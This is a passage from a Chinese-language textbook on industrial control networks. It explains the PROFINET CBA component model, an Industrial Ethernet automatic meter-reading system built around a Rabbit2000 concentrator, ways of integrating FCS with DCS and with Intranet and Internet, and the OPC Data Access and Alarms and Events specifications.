复用性的程度。从用户的角度出发,工艺技术模块必须具有可操作的功能,即通过接口从外部对其进行操作。所以PROFINET组件就是用户可从外部操作的工艺技术模块,也就是具备外部接口的工艺技术模块。图9⁃9所示是PROFINET组件表示填充(fill)工艺技术模块的例子。每个组件有一个接口,它包含多个能与其他组件进行交换或用其他组件激活的变量,PROFINET组件接口是按照IEC61499来规定的。 3.现场设备的结构现场设备是组件的另外一种称呼,在最简单的情况下,PROFINET组件就是现场设备,但是也可以把多个现场设备组合成一个组件。具有特定功能的现场设备和组件是由制造商为用户开发出来的,一般情况下,用户不必知道现场设备内部的详细情况。一个现场设备至少由以下几部分组成:(1)一个物理设备(PDev)PDev提供对以太网的访问进口,它包含MAC地址和IP地址,每个组件都使用PDev来寻址,与该组件发生联系的其他设备就是通过PDev来登入的。(2)一个或多个逻辑设备(LDev)LDev是实际应用(用户程序)的登入点,和RT⁃Auto中的可执行的用户程序相对应。每个LDev有一个活动控制链接对象(ActiveControlConnectionObject,ACCO),它是PROFINET组件的核心部分。ACCO集成在每个CBA设备内,既可以作为数据提供者,也可以作为数据消费者。ACCO确保PROFINETCBA设备中数据交换的协调,负责建立所组态的通信关系。对于CBA,所有的通信都是由ACCO发起的。作为提供者,它自动地准时向消费者发送其所请求的数据;作为消费者,它向相应的RT⁃Auto提供所接收的数据。图9⁃11所示为ACCO的工作原理。(3)每个LDev有一个或多个运行期对象实时自动化(RT⁃Auto),即包含着工业技术功能要求的可执行程序,它总是被指定一个LDev,在一个现场设备中可以有多个RT⁃Auto。4.PROFINETCBA的使用过程对PROFINETCBA在一个系统中的应用来说,其创建或设计过程一般包括下面三个阶段:1)创建组件。2)组件互联。3)把互联信息下载到现场设备。标准的组件是由机器制造商为用户提供的,有些情况下需要系统工程师亲自去创建一个组件。组件用标准化的PCD(PROFINETComponentDescription)来描述,PCD就和DP中GSD文件的作用一样。PCD使用XML来描述PROFINET组件和其接口技术,以XML文件的形式存储。XML可以使描述数据与制造商和平台格式无关,所有PROFINET工程工具都能理解XML格式的文件。在创建组件时,相关的工具还生成全球唯一的标识符(UniversalUniqueIdentifier,UUID),UUID用来标识组件及其功能,可以保证只有功能相同的组件才有相同的UUID。组态工程师在进行组态时,其工作就变得相当简单了,只要使用PROFINET互联编辑器,把使用PCD文件描述的PROFINET组件按控制系统功能的要求连起来就可以了,所做的工作大部分是操作鼠标把相关PCD从库中取出,拖放到相应应用中。接下来的工作是给现场设备分配IP地址。IP地址在工程工具中分配,它包含两部分内容,一是网络部分(NetworkID),二是用户部分(HostID)。在完成互联组件和分配地址后,工程工具将通信需要的所有数据下载到相关的现场设备中,这样,每个设备都知道其对等的通信伙伴和通信关系以及所要交换的信息了。到此,PROFINETCBA就可以应用了。9.3.2基于工业以太网的抄表系统工业企业所需能源一般包括水、电、蒸汽和煤气等,随着工业现代化的发展,企业对这些能源的需求也越来越大,同时企业对这些能源的使用情况也需要有一个比较及时、详细、准确的了解,以实现对企业能耗的分析及对设备状况的考查和班组的考核等。这些给能源抄表带来了一定的压力,能源表一般安装都比较分散,传统的人工抄表方式一直存在着抄表不到位、实抄率低、抄表质量差和抄表不及时等问题,这就对抄表技术提出了新的要求,所以亟需一种自动化的抄表技术来满足企业对能源管理的要求,于是基于工业以太网的自动抄表系统便应运而生。1.系统总体结构本系统集电量数据采集、显示、打印和远程抄表于一体,图9⁃12所示为基于工业以太网的抄表系统拓扑结构图。(1)仪表设备布置在现场,负责实时采集数据、记录现场情况等,它通过EIA⁃485通信接口挂在某个集中器上。在本系统中,采用多功能智能仪表作为底层现场设备,可以同时记录温度、流量和压力三种数据,最小采样周期可以随意设置成不小于1min的值(范围为1~255min),用户可根据需要设置各种参数来实现指定的仪表功能、运算等。该智能仪表还有故障检测与处理功能,如果2s没有接收到任何数据就视为故障,连续5次没有接收到任何数据视为断线。该仪表保留有扩展数据,可用于扩展功能需传递的信息,具体的数据类型、长度等由厂商提供相关协议。(2)集中器站点负责数据中转任务。与底层通信通过EIA⁃485接口完成,与抄表中心之间通信根据具体情况有三种不同的方式:电话网(MODEM)、以太网和无线网。(3)抄表中心负责数据抄送与管理,根据不同的集中器设计不同的通信接口。抄表中心的功能模块有以下几个方面的功能:设备管理包括设备的添加、删除、查找和参数修改等功能;用户管理包括添加/删除用户、设置/修改密码和用户权限等功能;通信管理负责抄送数据和读取/修改底层设备的各种参数,比如采样周期等;历史数据管理负责后台数据库的建立与管理、历史数据的统计与分析和历史报表的打印等。2.系统硬件设计本系统采用Z⁃World公司生产的以Rabbit2000微处理器为核心的RCM2100模块来开发集中器。集中器硬件结构如图9⁃13所示。(1)Rabbit2000Rabbit2000是Rabbit半导体公司为嵌入式环境设计的高性能低价位的8位微处理器,以其具备支持C语言友好指令集和快速数字处理功能而受到瞩目。Rab⁃bit2000模块的工作频率为22.1MHz,带有512KB的FLASHROM、512KB的SRAM以及RJ⁃45以太网接口,并且可以根据需要扩展EIA⁃232接口。Rabbit2000模块有A、B、C、D、E这5个并行口,即40位I/O可供使用。但为了实现以太网的接口,D和E口中预先用掉了6位I/O口,用户真正可以使用的I/O口一共有34位,其中输入口为10位,输出口为6位,剩下的18位I/O口用户可以通过软件来设定它们的输入、输出状态。(2)MAX485总线让Rabbit2000与485总线相连接是485通信模块的主要功能,使控制器可以通过485总线与仪表进行通信,对底层仪表进行数据采样、参数设置等。(3)以太网接口网络模块的主要功能是使Rabbit2000具有与以太网通信的功能,使其可以连接到以太网上,与远程服务器进行通信。这里设计使用RTL8019AS以太网接口芯片(10Mbit/s)来实现这一功能。由于Rabbit2000只有8位的数据线,所以也只用到RTL8019AS芯片的低8位地址线。Rabbit2000的PE7、PE6、PE1分别用作读信号控制线、写信号控制线和复位控制线。网络模块的结构原理如图9⁃14所示。3.系统软件设计(1)上位机软件设计传统的工业控制软件都是针对某一特定控制对象直接开发的,这就有一个比较大的缺点:工业被控对象一旦变动就必须改动源程序,极大浪费了人力和时间。组态软件的出现很好地解决了这个问题,通用组态软件支持的底层设备有智能仪表、智能模块、PLC和板卡等,同时还支持OPC服务器和DDE设备。虽然一般的通用组态软件都没有支持本系统中底层设备的驱动,但只要开发出OPC服务器或DDE设备,就能利用组态软件来开发形象直观的控制界面了。因此提出相对可行的软件设计方案:组态软件+OPC服务器,组态软件负责监控界面的设计、历史数据分析与管理、报表生成与打印、报警事件处理和用户管理等功能;OPC服务器则负责从现场仪表采集数据并按照OPC规则给其客户程序(这里是指组态软件)提供实时数据。(2)通信模块这一模块主要包括:根据不同的方式与三种不同集中器进行通信,完成读写仪表参数、查询状态、抄送当前和历史数据等功能。在无线网和电话网抄送方式中,与GSM模块和MODEM的通信是通过串口控件(MSComm)完成的,而在以太网抄送方式中则通过Winsock控件完成。Socket的通信原理如下:Socket套接字分两种,流式Socket和数据报式Socket。流式Socket是一种面向连接的Socket,针对面向连接的TCP服务应用;数据报式Socket是一种无连接,对应于无连接的UDP服务应用。用Socket套接字进行数据传输主要包括以下几个步骤:1)Socket建立。调用Socket函数,该函数返回一个类似于文件的描述符句柄。Socket描述符是一个指向内部数据结构的指针,它指向描述符表入口。两个网络程序之间的一个网络连接包括五种信息:通信协议、本地协议地址、本地主机端口、远端主机地址和远端协议端口。2)Socket配置。在使用Socket进行网络传输之前,必须配置该Socket。面向连接的Socket客户端通过调用connect函数保存本地和远端信息。无连接Socket的客户端和服务端以及面向连接Socket的服务端通过调用bind函数来配置本地信息。3)连接建立。服务器端的Socket通过bind函数配置本地信息以后,调用listen函数使Socket处于被动的监听模式,并为该Socket建立一个输入数据队列,将到达的服务请求保存在此队列中,并等待accept函数来接收它们。而客户Socket则使用connect函数来配置Sock⁃et并与远端服务器建立一个TCP连接。4)数据传输。send和recv这两个函数用于面向连接的Socket上进行数据传输,而sendto和recvfrom函数用于在无连接的数据报Socket方式下进行的数据传输。5)结束传输。当所有的数据操作结束以后,可以调用close函数来释放该Socket,从而停止在该Socket上的任何数据操作。也可以调用shutdown函数来关闭该Socket。该函数只允许停止在某个方向上的数据传输,而另一个方向上的数据传输继续进行,比如可以关闭某Socket的写操作而允许继续在该Socket上接收数据,直至读入所有数据。以上介绍了Socket通信的原理,但在本项目的上层软件中,不需要直接调用这些低级的SocketAPIs来开发程序,利用微软公司提供的Winsock控件就可以很方便地与各站点建立通信连接。(3)上、下层软件通信协议上层软件与Rabbit2000通信是通过基于TCP/IP的Socket实现的,这里主要介绍TCP/IP之上的应用层协议。当抄表中心与Rabbit2000站点建立Socket连接之后,抄表中心就可以发送各种命令来实现相应的操作。抄表中心发送的命令必须按照约定的格式组成数据帧,否则Rabbit2000站点将无法识别。Rabbit2000站点接收到抄表中心发送过来的命令后,就对接收到的数据帧进行校验,如果校验和出错就丢弃数据帧,如果校验和正确就按照约定的协议分析数据,针对不同的功能码去取相应的数据,再将取得的数据按照表9⁃2的格式封装好返回给抄表中心。如果抄表中心发送的命令是设置仪表参数,那么Rabbit2000站点还将通过EIA⁃485总线与现场仪表通信,将从抄表中心那里接收到的命令重新封装再转发给现场仪表。设置参数成功以后仪表会返回确认信号,Rabbit2000站点则需再将这个确认信号转发回抄表中心。(4)控制器程序控制器的程序是用Rabbit半导体公司提供的DynamicC开发平台所开发的。DynamicC是一个专门为Z⁃World产品创建的集成的C编译器、编辑器、链接器、装载器和调试器。它还配备了完善的TCP/IP栈、各种I/O驱动函数库、完善的文件管理系统等,使得软件的开发与调试非常方便。由于控制器位于整个抄表系统的中间层,它既要通过EIA⁃485总线与底层仪表通信,又要通过以太网与服务器通信,所以控制层软件必须同时兼顾到两层上的信息传输。采用DynamicC所提供的一个特有功能“协作式多任务”(CooperativeMultitask),其主要作用就是可以让多个任务互相协调来共同使用Rabbit2000。在控制器程序中设置两个任务:一个任务负责485通信,另一个任务负责网络通信。在每个任务执行时,一旦不需要使用Rabbit2000,该任务都会主动放弃对Rabbit2000的控制权,让另一个任务获得Rabbit2000以执行程序,如此循环。这样就很好地解决了控制器与服务器和仪表之间的通信问题。对于用户的按键输入,采用的是中断响应的方法,即用户在要通过按键对控制器进行设置时,要先按下Set键,产生一个外部中断,在中断服务请求(InterruptServiceRequest,ISR)中使控制器处于设置状态,一旦控制器进入设置状态,LCD上就会显示出控制器的各个参数,此时就可以通过其他按键对控制器的各个参数进行设置。设置完成后,控制器会将新的参数读入系统继续运行。控制器的程序流程图如图9⁃15所示。 第10章控制网络集成与OPC技术 现场总线控制系统(FCS)是一种分布式的网络自动化系统,采用的是层次化的网络结构。与此同时,Intranet和Internet发展迅速。在这样的背景下,就更要发展FCS和网络集成技术。在现场总线国际标准制定的过程中,2000年初共有8种现场总线同时成为IEC现场总线标准的子集,可见多种总线共存的局面在很长一段时期内仍是无法避免的。为了适应各种不同的现场总线协议,必须实现各种现场总线控制系统的集成。主要解决方案有两种:一种是以专用网关实现控制量的对应转换,另一种是进行协议上的修改,以尽可能地实现兼容。例如,由ISP和WorldFIP合并的基金会现场总线本身就是遵循现场总线间协议统一的产物。各个公司顺应这一情况,也相继推出能够让多种现场总线协同工作的控制系统。Smar公司的System302能够同时支持FF、PROFIBUS和HART等总线协议;法国Alstom公司的Alspa8000系统由Ethernet、WorldFIP为主构成,并用一个网关与智能仪表相连。多种现场总线集成并协同完成复杂测控任务,是目前组成自动化系统的重要方式。对于不同协议的现场总线系统进行集成,总体上讲可以采用硬集成与软集成两大类:硬集成主要指采用相应的网关加以实现,软集成通常可以采用将对象链接与嵌入技术用于过程控制,即OPC解决方案。10.1控制网络集成FCS的基础是现场总线,它是现场通信网络与控制系统的集成,是用于过程自动化和制造自动化最底层的现场仪表或现场设备互连的通信网络。FCS是利用现场总线技术逐步发展形成的,它的基础是传统的仪表控制系统和集散控制系统(DCS)。目前工业中依然使用着大量的模拟仪表和DCS,现场总线式数字仪表不可能完全取代模拟仪表,FCS也不可能完全取代DCS。根据现状,可以预测现场总线式数字仪表将逐步取代常规的模拟仪表,FCS将逐步改造传统的DCS结构直至完全取代DCS。在这段过渡期内,FCS和DCS集成是技术更新的必由之路。目前世界上有很多种现场总线,每种现场总线既然能存在,就必有其优势。现场总线的标准是多元化的,因此发展多种现场总线之间的集成技术是大势所趋。从实用角度来看,现场总线控制系统集成要解决的两个重要问题是其如何与DCS无缝连接以及如何与Intranet、Internet等网络无缝连接。10.1.1FCS和DCS的集成方法DCS已广泛地应用于生产过程自动化,现场总线和FCS的应用要借助于DCS,这样既丰富了DCS的功能,又推动了现场总线和FCS的发展。FCS和DCS的集成方法有三种:现场总线和DCS输入输出总线的集成、现场总线和DCS网络的集成以及FCS和DCS的集成。1.现场总线和DCS输入输出总线的集成DCS的控制站主要由控制单元(ControlUnit,CU)和输入输出单元(InputOutputUnit,IOU)组成,这两个单元之间通过I/O总线连接。控制单元的功能主要有:1)通过I/O总线与输入输出单元通信,建立I/O数据库。2)实现运算和控制功能,完成用户组态的控制策略。3)与DCS网络(DCSNet)通信。输入输出单元的I/O总线上挂接了各类I/O模板,其中常用的有模拟量输入、模拟量输出、数字量输入和数字量输出模板,通过这些模板与生产过程建立I/O信号联系。在I/O总线上挂接现场总线接口板和现场总线接口单元(FieldbusInterfaceUnit,FIU),如图10⁃1所示。现场仪表或现场设备通过现场总线与FIU通信,FIU再通过I/O总线与DCS的控制单元通信。这样便实现了现场总线和DCS输入输出总线的集成,即现场总线和DCS控制站的集成。例如,DeltaV控制器就是采用此种集成技术,DeltaV控制器的I/O总线上除了可插常规输入输出模板外,还可以插符合FF规范的低速H1现场总线接口板,从而将H1现场总线集成在DeltaV控制器中。H1接口板有两个端口,每个端口可以接一条H1总线。 现场总线和DCS输入输出总线的集成具有以下三个特点:1)除了安装现场总线接口板或现场总线接口单元外,不用再对DCS做其他变更。2)充分利用DCS控制站的运算和控制功能块,因为初期开发的现场总线仪表中功能块的数量和种类是有限的。3)利用已有DCS的技术和资源,投资少、见效快,便于现场总线的推广应用。2.现场总线和DCS网络的集成一种最基本的初级集成技术是在DCS控制站的I/O总线上集成现场总线,还可以在DCS的更高一层集成,即在DCS网络上集成现场总线,如图10⁃2所示。现场总线服务器(FieldbusServer,FS)挂接在DCS网络上,并安装了现场总线接口卡和DCS网络接口卡,它是一台完整的计算机。现场设备或现场仪表通过现场总线与其接口卡通信,现场仪表中的输入、输出、控制和运算等功能块可以在现场总线上独立构成控制回路,而不必借用DCS控制站的功能。FS通过其DCS网络接口卡与DCS网络通信,也可以把FS看作DCSNet上的一个节点或DCS的一台设备,这样FS和DCS之间可以互相共享资源。FS可以不配备操作员站或工程师站,而直接借用DCS的操作员站或工程师站。现场总线和DCS网络的集成具有以下4个特点:1)除了安装现场总线服务器外,不用再对DCS做其他变更。2)在现场总线上可以构成独立控制回路,实现彻底的分散控制。3)FS中有一些高级功能块,可以与现场仪表中的基本功能块统一组态,构成复杂控制回路。4)利用已有DCS的部分资源,投资少、见效快,便于现场总线的推广应用。3.FCS和DCS的集成在上述两种集成方式中,现场总线借用DCS的部分资源,也就是说,现场总线不能自立。FCS参照DCS的层次化体系结构组成一个独立的开放式系统,DCS也是一个独立的开放式系统,如此,这两个系统之间可以集成。FCS和DCS的集成有两种方式:一种是FCS网络通过网关与DCS网络集成,在各自网络上直接交换信息,如图10⁃3所示;另一种是FCS和DCS分别挂接在Intranet上,通过Intranet间接交换信息。 FCS和DCS的集成具有以下4个特点:1)独立安装FCS,对DCS几乎不做变更,只需在DCSNet上接一台网关。2)FCS是一个完整的系统,不必借用DCS的资源。3)既有利于FCS的发展和推广,又有利于充分利用现有的DCS资源。4)系统投资大,适用于新建装置。10.1.2FCS和Intranet的集成方法FCS是一种分布式的网络自动化系统,其基础是现场总线,位于网络结构的最底层,因而被称为底层网(Infranet)。FCS的上层是Intranet,Intranet下面可以挂接多个FCS或DCS的底层网或控制网络。Intranet的上层是Internet,Internet下面可以挂接多个Intranet。用网络集成的概念来分析FCS,FCS和网络的集成方式有两种:FCS和Intranet的集成以及FCS和Internet的集成。1.FCS和Intranet的集成FCS和Intranet的集成方法有以下4种:(1)FCS和Intranet之间通过网桥或网关等网间连接器互联这种方式通过硬件来实现,即在底层网段与中间监控层之间加入中继器、网桥和路由器等专门的硬件设备,使控制网络作为信息网络的扩展与之紧密集成。硬件设备可以是一台专门的计算机,依靠其中运行的软件完成数据包的识别、解释和转换;对于多网段的应用,它还可以在不同网段之间存储转发数据包,起着网桥的作用。此外,硬件设备还可以是一块智能接口卡,艾默生公司过程管理的DeltaV控制器就是通过一块机柜中的H1接口卡,完成现场总线智能设备与以太网中监控计算机之间的数据通信的。转换接口的集成方式功能较强,但是实时性较差。信息网络一般是采用TCP/IP的以太网,而TCP/IP没有考虑数据传输的实时性,当现场设备有大量信息上传或远程监控操作频繁时,转换接口都将成为实时通信的瓶颈。(2)OPC技术对象连接嵌入(OLE)技术已广泛应用,OPC是用于过程控制用对象连接与嵌入技术。OPC采用客户/服务器(Client/Server)结构,其服务器对下层设备提供接口,使得现场控制层的各种过程信息能够进入OPC服务器,从而实现向下互联。另外,OPC服务器还对上层设备提供标准的接口,使得上层Intranet设备能够取得OPC服务器中的数据,从而实现向上互联。这两种互联都是双向的,也就是说,OPC是FCS和Intranet之间连接的桥梁。(3)在FCS和Intranet之间采用动态数据交换(DDE)技术当FCS和Intranet之间具有中间系统或共享存储器工作站时,可以采用DDE方式实现二者的集成,其实质是各应用程序通过共享内存来交换信息,中间系统中的信息处理机是现场总线控制网络的工作站,也是Intranet中的工作站。其中运行两个程序:一是接收、校验实时信息的通信程序,为Intra⁃net数据库提供实时数据信息;另一个是数据访问应用程序接口,它接收DDE服务器实时数据,并写入数据库服务器中,供Intranet实现信息处理、统计分析等功能。DDE方式具有较强的实时性,而且比较容易实现,可以采用标准的Windows技术,但是DDE的速度不是很快,因此这种方式仅适合配置简单的小系统。(4)FCS和Intranet采用统一的协议标准这种方式将成为现场总线控制网络和Intranet完成集成的最终解决方案。由于控制网络和信息网络采用了面向不同应用的协议标准,因此二者集成时总需要某种数据格式的转换机制,这将使系统复杂化,也不能确保数据的完整性。如果信息网络的协议标准是提高其实时性,而控制网络的协议标准是提高其传输速度,二者的兼容性就会提高。信息网络与控制网络合二为一,这样从底层设备到远程监控系统,都可以使用统一的协议标准,不仅确保了信息准确、快速、完整地传输,还可以极大地简化系统设计。这种最终解决方案的产物之一就是发展成熟后的工业以太网。目前,像FF、PROFIBUS和LonWorks等现场总线致力于使自己的通信协议尽量兼容TCP/IP,因此可以方便地实现以太网和Intranet的集成,使控制网络和信息网络紧密地结合在一起,最终实现统一的网络结构。2.FCS和Internet的集成网络已经把社会、企业和家庭连接在一起,Internet也已经把世界联系得更加紧密。如果控制网络(FCS或DCS)中的实时控制信息和数据网络中管理决策信息结合起来,那将使网络功能得到充分发挥。FCS和Internet的集成可以有两种方式:一种是FCS通过Intranet间接和Internet集成;另一种是FCS直接和Internet集成。FCS和网络的集成构成了远程监控系统,实现了Infra⁃net、Intranet和Internet的互联。人们通过网络对远处生产过程进行监督和控制,对现场设备进行诊断和维护以及对生产企业进行管理和指挥。3.FCS和现场总线的集成世界上有多种现场总线,仅国际电工委员会(IEC)通过的现场总线标准IEC61158第四版就包含20种类型。另外还有其他国际和国家标准现场总线,如CAN、LonWorks和WorldFIP等。现场总线是FCS的基础,怎样把多种现场总线集成于FCS,是FCS开发者研究的课题。FCS和现场总线的集成方式有两种:一种是通过网关给各个现场总线之间提供转换接口,另一种是给各个现场总线提供标准的OPC接口。前者开发工作量大,不具有通用性,而后者开发工作量小,具有通用性。在现场总线协议尚未完全统一的情况下,可以利用网关对协议进行转换识别,但是这样做既加大了硬件投入,又增加了网络延迟,所以这种方法仅仅是过渡措施。现场总线协议的统一工作虽然艰难,有许多问题需要解决,但可以预测将来会采用统一标准,到那时不同制造商的总线模块产品能够完全兼容,现场总线无疑会进入一个更加迅猛发展的新阶段。10.2OPC技术10.2.1OPC技术基础OPC可实现控制系统现场设备级与过程管理级之间的信息交换,是实现控制系统开放性的重要方法,为多种现场总线之间的信息交换以及控制网络与信息网络之间的信息交互提供了较为方便的途径。1.OPC规范基础(1)COM/DCOM简介随着计算机软件科学的发展,应用系统功能日趋复杂,程序愈加庞大,软件开发的难度也更大。为此,需要将应用程序划分为多个功能独立的模块,由各模块协同完成实际的任务。这些模块称为组件,它们可以进行单独设计、编译和调试,因此具有开放性、易升级和易维护等优点。COM(ComponentObjectModel)是一个由微软公司推出的开放的组件标准。COM标准包括规范和实现两大部分,规范部分定义了组件之间通信的机制,这些规范不依赖任何特定的语言和操作系统,具有语言无关性;实现部分是COM库,COM库为COM规范的具体实现提供了一些核心服务。由于COM以客户/服务器模型为基础,因此具有良好的稳定性和很强的扩展能力。DCOM提供了一种使COM组件加入网络环境的透明网络协议,实现了在分布式计算环境下不同进程之间的通信与协作,它是建立在COM之上的一种规范和服务。客户程序和COM组件程序进行交互的实体是COM对象,COM对象类似C++语言中对象的概念,它是某个类(Class)的一个实例,包括一组属性和方法。COM对象提供的方法就是COM接口,它是一组逻辑相关函数的集合,客户程序必须通过COM接口才能获得COM对象的服务。(2)OPC对象与接口OPC规范描述了OPC服务器需要实现的COM对象及其接口,它定义了定制接口(CustomInterface)和自动化接口(AutomationInterface)。每种不同的OPC规范又分为定制接口规范和自动化接口规范两部分,以方便开发者设计和实现OPC服务器程序或客户程序。OPC客户程序通过接口与OPC服务器通信,间接地对现场数据进行存取。OPC服务器必须实现如图10⁃4所示的定制接口,也可有选择地实现自动化接口。一般来说,自动化接口能为VisualBasic(VB)等高级语言客户程序提供极大的便利,但数据传输效率较低,而定制接口则为用C/C++语言编写的客户程序带来灵活高效的调用手段。在有些情况下,OPC基金会提供了标准的自动化接口封装器,以方便自动化接口和定制接口之间的转换,使采用自动化接口的客户程序也可以访问只实现了定制接口的服务器。OPC规范定义了COM接口,规定了服务器程序和客户程序通过接口交互的标准,但并未说明具体实现的方法,OPC服务器供应商必须根据各自硬件特性实现这些接口的成员函数。不论定制接口还是自动化接口都可分为必选接口和可选接口,必选接口包括了客户程序与服务器进行交互的最基本功能,因此必须实现;可选接口则规定了一些额外的高级功能,可根据需要有选择地实现。客户程序应通过查询接口的方式来判断服务器程序是否实现了可选接口功能。2.OPC数据存取规范OPC数据存取规范是OPC基金会最初制定的一个工业标准,其重点是对现场设备的在线数据进行存取。该规范也分为定制接口规范和自动化接口规范两部分,两种接口完成的功能类似,下面主要介绍定制接口规范中的基本对象和接口功能。OPC数据存取服务器主要有三个对象:服务器对象、组对象和项对象。OPC服务器对象维护有关服务器的信息,并作为OPC组对象的包容器,可动态地创建或释放组对象;OPC组对象除了维护有关其自身的信息之外,还提供了包容OPC项的机制,逻辑上管理OPC项;OPC项则表示了与OPC服务器中数据的连接。图10⁃5示意了这几个对象间的相互关系以及它们和OPC客户程序的关系。 从定制接口的角度来看,OPC项并不是可以由OPC客户直接操作的对象,因此OPC项没有定义外部接口,所有对OPC项的操作都是通过包容该项的OPC组对象进行的。而OPC服务器对象和组对象是聚合关系,即OPC服务器对象创建OPC组后,将组对象的指针传递给客户,由客户直接操纵组对象。这样既提高了数据存取的速度,也易于功能扩展,体现了组件软件的重要性。(1)OPC服务器对象OPC服务器对象是OPC服务器程序暴露的主要对象,客户程序首先创建该对象再通过其接口完成所需功能。图10⁃6所示为标准OPC服务器对象及其定制接口。 IUnknown接口是所有COM组件都必须实现的一个基本的标准接口,它为客户程序提供了QueryInterface的方法进行接口查询,并且应用计数的方法决定COM对象的生存周期。IOPCCommon接口是各类OPC服务器都使用的接口,通过该接口可为某个特定的客户/服务器对话设置和查询本地标识(LocalID)。这样,一个客户程序的操作将不会影响其他客户程序。IOPCServer接口是OPC服务器对象的主要接口。客户程序可通过该接口创建、查询和删除组对象,并了解OPC服务器自身的信息。这些信息包括服务器创建时间、运行状态、组对象的个数和版本号等。IConnectionPointContainer接口是COM规范中的标准接口,用于实现服务器程序向客户程序发送通知或事件。当OPC服务器关闭时,需要通知所有的客户程序释放OPC组对象和其中的OPC项,此时可利用该接口调用客户程序方的IOPCShutdown接口实现服务器的正常关闭。IOPCItemProperties接口为客户程序提供了一种方便浏览OPC服务器存储区中数据项属性的方法,这些属性包括工程量、设定值、高限报警值、低限报警值和注释等。通过该接口,OPC客户无须创建和管理组就能直接得到这些信息,简化了操作。OPC规范中组对象可分为公共组(PublicGroup)和局部组(LocalGroup),公共组可以被多个客户共享,而局部组只能被一个客户使用,因此可采用特定的IOPCServerPublicGroups可选接口来管理公共组。公共组可以由OPC服务器程序或客户程序创建,对客户程序而言,它总是先创建一个局部组,然后再转化为公共组。客户程序可通过该接口改变公共组对象的激活状态,设置其中OPC项的数据类型等,但这些操作并不影响已与公共组连接的其他客户程序。与局部组不同的是,客户程序不能添加或删除公共组内的OPC项。IOPCBrowseServerAddressSpace可选接口为OPC客户程序提供了浏览服务器中有效数据项的机制,这些数据项往往和现场设备相关联,代表某个现场信息。OPC服务器总是先浏览这些数据项,然后将需要的数据项作为OPC项添加到OPC组对象中进行数据存取。如果没有实现该可选接口,客户程序添加OPC项时必须知道服务器中数据项的确切名称才能建立起与数据源的正确连接。IPersistFile可选接口也是标准的COM接口,该接口允许客户程序调入或存储服务器的设置,这些设置包括服务器通信的波特率、现场设备的地址和名称等。这样,当系统重新启动时,不需要再对服务器进行设置。需要注意的是,客户程序创建的组对象名称、项对象名称等信息应该由客户程序存储,与该接口无关。(2)OPC组对象OPC组提供了一种让客户组织数据的方法,客户可以将逻辑相关的一组数据作为OPC项添加到同一个组当中,例如同一个反应器的各点温度等。客户程序可创建多个组对象,并分别设置属性。客户程序对服务器进行数据存取时是以组对象为单位进行的,即客户程序对组内感兴趣的OPC项进行统一的读写操作,这样无疑提高了数据通信的效率。标准OPC组对象及其定制接口如图10⁃7所示。IOPCItemMgt接口允许客户程序组对象添加、删除和管理其包括的OPC项,例如设置OPC项的激活状态和数据类型等属性。客户程序通过IOPCGroupStateMgt接口来管理整个组对象的状态,主要设置组对象向客户程序提交数据变化的刷新速率、激活状态等。IOPCPublicGroupStateMgt可选接口则允许客户程序将局部组转化为公共组。OPC客户程序对OPC服务器中数据的存取方式分为同步读写方式和异步通报方式。客户程序可按照一定的周期调用IOPCSyncIO接口对服务器程序进行数据同步存取操作,此时客户方的调用函数一直运行到所有数据读写完成。IOPCAsyncIO2和IOPCAsyncIO是异步通报方式中使用的接口,其中前者是在2.0版本中新定义的,并与IConnectionPointContainer接口一起使用,具有更高的通信能力;后者则是和IDataObject接口结合使用的。在异步通报方式下,服务器程序定期刷新OPC项,并判断其数值或品质是否发生变化,如果有变化,则调用客户程序方的IOPCDataCallback接口,将变化后的数据发送给客户程序。异步通报方式中,允许服务器将读写操作排队,使客户方的调用函数可立刻返回,当服务器读写操作完成后,再通知客户程序。显然,异步通报方式的通信效率更高,但有多个客户程序与服务器相连时,同步读写方式更具时效性。对于每个组对象,客户程序可根据需要采用其中一种数据存取方式,而不能两者都使用。(3)OPC项对象OPC项对象表示与OPC服务器中数据的连接,包括值(Value)、品质(Quality)和时间戳(TimeStamp)三个基本属性。值的属性类型为VARIANT,表示实际的数值,品质标识数值是否有效,时间戳则反映了从设备读取数据的时间或者服务器刷新其数据存储区的时间。需要指出的是,OPC项并不是实际的数据源,只是表示与数据源的连接。OPC规范中定义了两种数据源:内存数据(CacheData)源和设备数据(DeviceData)源。每个OPC服务器都有数据存储区,存放着值、品质、时间戳以及相关设备信息,这些数据称为内存数据,而现场设备中的数据则是设备数据。OPC服务器总是按照一定的刷新频率通过相应驱动程序访问各个硬件设备,将现场数据送入数据存储区,这样对OPC客户而言,可以直接读写服务器存储区中的内存数据。这些数据是服务器最近一次从现场设备获得的数据,但并不能代表现场设备中的实时数据。为了得到最新的数据,OPC客户可以将数据源指定为设备数据源,这样服务器将立刻访问现场设备,并将现场数据反馈给OPC客户。由于需要访问物理设备,所以OPC客户读取设备数据时速度较慢,往往用于某些特定的重要操作。3.OPC报警与事件规范OPC报警与事件规范(AlarmsandEventsSpecification)提供一种由服务器程序将现场报警和事件通知客户程序的机制,使工控软件可以按照统一的标准处理现场的各种报警事件。过程控制中,报警和事件概念在不严格的场合下可以互换,二者意义上的区别并不明显。在OPC规范中,报警是一种需引起客户程序注意的非正常状态(Condition),这种状态可以用OPC报警与事件服务器对象或其包容的对象来表示,例如服务器内定义的标签FC101(设备位号为101的流量控制)可以与水平报警和波动报警相关。对某个状态还可以定义它的子状态,例如水平报警可分为上线报警、上上线报警、正常、下线报警、下下线报警。事件则是一种可以检测到的变化情况,它可以和某种状态相关,也可以不相关,例如液位从正常变为上线报警就是一种与状态相关的事件,而操作员的操作、系统组态变化以及系统错误则是与设定状态不相关的事件,OPC规范中用OPCCondition和OPCEventNotification分别表示状态和事件,并详细规定了它们的属性。报警与事件规范主要支持两种类型的服务器:一种是简单事件服务器,它可以检测报警事件并通知OPC客户程序;另一种是复杂事件服务器,它除了提供以上功能外,还可对报警和事件进行分类和过滤等高级操作。OPC事件服务器主要包括OPC事件服务器(OPCEventServer)对象、OPC事件预定(OPCEventSubscription)对象以及OPC事件区域浏览(OPCEventAreaBrowser)对象,三者的关系如图10⁃8所示。 